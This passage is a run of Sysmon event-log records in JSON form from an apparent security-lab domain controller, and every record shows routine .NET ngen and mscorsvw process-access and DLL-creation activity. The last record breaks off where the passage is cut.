{"EventTime":"2020-08-01 08:05:29","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7238,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:29.445\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2249-5F25-0000-0010F4A00C00}\r\nTargetProcessId: 2332\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:29.445","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2249-5F25-0000-0010F4A00C00}","TargetProcessId":"2332","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7239,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:30.257\r\nProcessGuid: {41C8662E-2249-5F25-0000-0010F4A00C00}\r\nProcessId: 2332\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\91c-0\\Microsoft.Transactions.Bridge.dll\r\nCreationUtcTime: 2020-08-01 08:05:30.257","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:30.257","ProcessGuid":"{41C8662E-2249-5F25-0000-0010F4A00C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\91c-0\\Microsoft.Transactions.Bridge.dll","CreationUtcTime":"2020-08-01 08:05:30.257","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7240,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.320\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001012A80C00}\r\nTargetProcessId: 3536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.320","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001012A80C00}","TargetProcessId":"3536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7241,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.320\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001012A80C00}\r\nTargetProcessId: 3536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.320","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001012A80C00}","TargetProcessId":"3536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7242,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.320\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001012A80C00}\r\nTargetProcessId: 3536\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.320","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001012A80C00}","TargetProcessId":"3536","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7243,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.366\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001097AB0C00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.366","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001097AB0C00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7244,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.366\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001097AB0C00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.366","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001097AB0C00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7245,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-224A-5F25-0000-001097AB0C00}\r\nTargetProcessId: 4432\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:30.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-224A-5F25-0000-001097AB0C00}","TargetProcessId":"4432","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7246,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:30.601\r\nProcessGuid: {41C8662E-224A-5F25-0000-001097AB0C00}\r\nProcessId: 4432\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1150-0\\Microsoft.Transactions.Bridge.Dtc.dll\r\nCreationUtcTime: 2020-08-01 08:05:30.601","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:30.601","ProcessGuid":"{41C8662E-224A-5F25-0000-001097AB0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1150-0\\Microsoft.Transactions.Bridge.Dtc.dll","CreationUtcTime":"2020-08-01 08:05:30.601","EventReceivedTime":"2020-08-01 08:05:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:30","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7247,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:30.632\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2232-5F25-0000-00101C930B00}\r\nTargetProcessId: 2924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 